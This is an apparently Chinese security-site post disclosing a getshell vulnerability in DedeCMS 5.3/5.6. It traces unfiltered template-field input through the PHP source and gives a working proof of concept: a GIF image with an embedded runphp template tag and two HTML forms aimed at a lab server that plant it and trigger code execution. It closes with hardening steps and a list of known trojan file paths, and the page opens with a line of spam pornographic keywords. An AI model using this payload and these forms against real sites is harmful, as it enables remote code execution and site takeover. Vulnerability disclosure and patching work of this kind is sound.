欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

DEDECMS 5.6最新Get Shell漏洞 DEDECMS 5.3/5.6

  發(fā)布時(shí)間:2011-08-19 10:46:17   作者:佚名   我要評(píng)論
DedeCms 基于PHP+MySQL的技術(shù)開(kāi)發(fā),支持Windows、Linux、Unix等多種服務(wù)器平臺(tái),從2004年開(kāi)始發(fā)布第一個(gè)版本開(kāi)始,至今已經(jīng)發(fā)布了五個(gè)大版本。
DEDECMS 5.6最新Get Shell漏洞
影響版本:  DEDECMS 5.3/5.6
  漏洞描述:
  DedeCms 基于PHP+MySQL的技術(shù)開(kāi)發(fā),支持Windows、Linux、Unix等多種服務(wù)器平臺(tái),從2004年開(kāi)始發(fā)布第一個(gè)版本開(kāi)始,至今已經(jīng)發(fā)布了五個(gè)大版本。DedeCms以簡(jiǎn)單、健壯、靈活、開(kāi)源幾大特點(diǎn)占領(lǐng)了國(guó)內(nèi)CMS的大部份市場(chǎng),目前已經(jīng)有超過(guò)二十萬(wàn)個(gè)站點(diǎn)正在使用DedeCms或居于 DedeCms核心,是目前國(guó)內(nèi)應(yīng)用最廣泛的php類(lèi)CMS系統(tǒng)。
  article_add.php

復(fù)制代碼
代碼如下:

........................
else if($dopost=='save')
{
include(DEDEMEMBER.'/inc/archives_check.php');
//分析處理附加表數(shù)據(jù)
$inadd_f = $inadd_v = '';
if(!emptyempty($dede_addonfields))
{
$addonfields = explode(';',$dede_addonfields);
............................................ //省略部份代碼
$inadd_f .= ','.$vs[0];
$inadd_v .= " ,'".${$vs[0]}."' ";
}
}
}
..........................................
$addtable = trim($cInfos['addtable']);
if(emptyempty($addtable))
{
......................................
}
else
{
$inquery = "INSERT INTO `{$addtable}`(aid,typeid,userip,redirecturl,templet,body{$inadd_f}) Values('$arcID','$typeid','$userip','','','$body'{$inadd_v})";
if(!$dsql->ExecuteNoneQuery($inquery))
{
..........................................
}
}
..........................................
$artUrl = MakeArt($arcID,true); //利用地方(arc.archives.functions.php有定義)
function MakeArt($aid,$ismakesign=false)
{
global $cfg_makeindex,$cfg_basedir,$cfg_templets_dir,$cfg_df_style;
include_once(DEDEINC.'/arc.archives.class.php');
if($ismakesign)
{
$envs['makesign'] = 'yes';
}
$arc = new Archives($aid);
$reurl = $arc->MakeHtml(); //arc.archives.class.php有定義
............................
}

  arc.archives.class.php

復(fù)制代碼
代碼如下:

class Archives
{
................
function __construct($aid)
{
............
if($this->ChannelUnit->ChannelInfos['addtable']!='')
{
$query = "SELECT * FROM `{$this->ChannelUnit->ChannelInfos['addtable']}` WHERE `aid` = '$aid'";
$this->addTableRow = $this->dsql->GetOne($query);
}
........................
if($this->ChannelUnit->ChannelInfos['addtable']!='' && $this->ChannelUnit->ChannelInfos['issystem']!=-1)
{
if(is_array($this->addTableRow))
{
...............................
$this->Fields['templet'] = $this->addTableRow['templet'];//注意1
......................................
}
}
.............................
}
function MakeHtml($isremote=0)
{
global $cfg_remote_site,$fileFirst;
if($this->IsError)
{
return '';
}
$this->Fields["displaytype"] = "st";
//預(yù)編譯$th
$this->LoadTemplet(); //觸發(fā)1
......................................//省略部份代碼
$this->arseDMFields($i,1);
$this->dtp->SaveTo($truefilename); //觸發(fā)2
......................................
}
繼續(xù)跟(觸發(fā)1)$this->LoadTemplet(); //arc.archives.class.php有定義
function LoadTemplet()
{
if($this->TempSource=='')
{
$tempfile = $this->GetTempletFile(); //注意2
if(!file_exists($tempfile) || !is_file($tempfile))
{
echo "文檔ID:{$this->Fields['id']} - {$this->TypeLink->TypeInfos['typename']} - {$this->Fields['title']}
";
echo "模板文件不存在,無(wú)法解析文檔!";
exit();
}
$this->dtp->LoadTemplate($tempfile); //觸發(fā)3
$this->TempSource = $this->dtp->SourceString;
}
else
{
$this->dtp->LoadSource($this->TempSource);
}
}
看注意2 的$this->GetTempletFile() //arc.archives.class.php有定義
function GetTempletFile()
{
global $cfg_basedir,$cfg_templets_dir,$cfg_df_style;
$cid = $this->ChannelUnit->ChannelInfos['nid'];
if(!emptyempty($this->Fields['templet'])) //注意3
{
$filetag = MfTemplet($this->Fields['templet']);
if( !ereg('/', $filetag) ) $filetag = $GLOBALS['cfg_df_style'].'/'.$filetag;
}
else
{
$filetag = MfTemplet($this->TypeLink->TypeInfos["temparticle"]);
}
.......................................
if($cid=='spec')
{
if( !emptyempty($this->Fields['templet']) )
{
$tmpfile = $cfg_basedir.$cfg_templets_dir.'/'.$filetag;
}
else
{
$tmpfile = $cfg_basedir.$cfg_templets_dir."/{$cfg_df_style}/article_spec.htm";
}
}
...........................................
return $tmpfile;
}

注意3中的值來(lái)自注意1是通過(guò)查表得來(lái)的,控制了它就等于控制了任意模板,然后通過(guò)觸發(fā)3來(lái)觸發(fā)漏洞
看下怎么控制注意1的值
article_edit.php

復(fù)制代碼
代碼如下:

......................
else if($dopost=='save')
{ ....................
if(!emptyempty($dede_addonfields))
{
$addonfields = explode(';',$dede_addonfields);
if(is_array($addonfields))
{
........................
${$vs[0]} = GetFieldValueA(${$vs[0]},$vs[1],$aid);
$inadd_f .= ','.$vs[0]." ='".${$vs[0]}."' ";
}
}
...................
if($addtable!='')
{
$upQuery = "Update `$addtable` set typeid='$typeid',body='$body'{$inadd_f},userip='$userip' where aid='$aid' ";
if(!$dsql->ExecuteNoneQuery($upQuery))
{..............
}
}
....................
}

$dede_addonfields沒(méi)有過(guò)濾,我們可以構(gòu)造$inadd_f為,templet='上傳的模板圖片地址',包含我們的圖片后,再通過(guò)觸發(fā)2來(lái)生成圖片里的后門(mén)!

本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用,風(fēng)險(xiǎn)自負(fù)! Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo(); {/dede:field}
保存為1.gif

復(fù)制代碼
代碼如下:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 2. <input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" /> 4. <input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" /> 6. <input name="title" type="hidden" id="title" value="1.jpg"
class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/> 8. <button class="button2" type="submit" >更改</button>
</form>

構(gòu)造如上表單,上傳后圖片保存為/uploads/userup/3/1.gif 發(fā)表文章,然后構(gòu)造修改表單如下:


復(fù)制代碼
代碼如下:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" /> 3. <input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> 5. <input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" /> 7. <input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100"
class="intxt"/> 9. <input type="text" name="writer" id="writer" value="123456" maxlength="100"
class="intxt" style="width:219px"/>
<select name='typeid' size='1'> 11. <option value='1'
class='option3' selected=''>Test</option>
<select name='mtypesid' size='1'> 13. <option value='0' selected>請(qǐng)選擇分類(lèi)...</option>
<option value='1'
class='option3' selected>aa</option></select> 15. <textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet"> 17. <input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> 19. <button class="button2" type="submit">提交</button>
</form>

安全建議:
如果您使用了DedeCMS程序,因目前DedeCMS暫未發(fā)布補(bǔ)丁修復(fù),請(qǐng)立即按如下流程處理:
1.在dedecms的后臺(tái)更新補(bǔ)丁,盡可能升級(jí)為最新版本。
2.data、templets、uploads、install這幾個(gè)目錄用控制面板的“目錄保護(hù)”功能 禁止執(zhí)行權(quán)限 。
3.如果只是使用文章系統(tǒng)并沒(méi)有使用會(huì)員功能,則強(qiáng)推推薦:關(guān)閉會(huì)員功能、關(guān)閉新會(huì)員注冊(cè)、直接刪除member目錄或改名。
4.用dedecms后臺(tái)的“系統(tǒng)”中的文件校驗(yàn)和病毒掃描功能 查殺病毒木馬。
5.檢查有無(wú)/data/cache/t.php 、/data/cache/x.php和/plus/index.php 這些木馬文件,有的話(huà)則應(yīng)立即刪除。
6.用虛擬主機(jī)控制面板中的“查殺病毒 ”功能全面查殺一次。
請(qǐng)及時(shí)關(guān)注dedecms的最新補(bǔ)丁,如果官方出新補(bǔ)丁,則應(yīng)立即更新。

廠商補(bǔ)丁EDECMS------------目前廠商還沒(méi)有提供補(bǔ)丁或者升級(jí)程序,我們建議使用此軟件的用戶(hù)隨時(shí)關(guān)注廠商的主頁(yè)以獲取最新版本:http://www.dedecms.com/

相關(guān)文章

最新評(píng)論